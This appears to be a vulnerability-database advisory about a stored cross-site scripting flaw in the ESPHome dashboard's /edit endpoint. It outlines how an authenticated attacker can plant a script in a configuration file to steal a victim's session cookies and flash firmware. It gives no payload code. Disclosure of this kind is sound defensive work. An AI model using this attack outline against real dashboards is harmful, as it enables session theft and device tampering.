Safety vulnerability ID: 78713
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the esphome package are vulnerable to Cross-Site Scripting (XSS) due to unsanitized content being served with an HTML content type. The /edit endpoint in the dashboard component allows a remote authenticated user to inject arbitrary JavaScript into configuration files without sanitization, and that script is subsequently rendered with `Content-Type: text/html; charset=UTF-8`. An attacker who is authenticated can craft a POST to `/edit?configuration=[file]` that includes a malicious script and then have a victim visit `/edit?configuration=[file]`, enabling exfiltration of session cookies and unauthorized operations such as reading, editing, deleting configuration files and flashing firmware on managed boards.
Latest version: 2025.9.3
ESPHome is a system to configure your microcontrollers by simple yet powerful configuration files and control them remotely through Home Automation systems.
This vulnerability has no description
Scan your Python project for dependency vulnerabilities in two minutes
Scan your application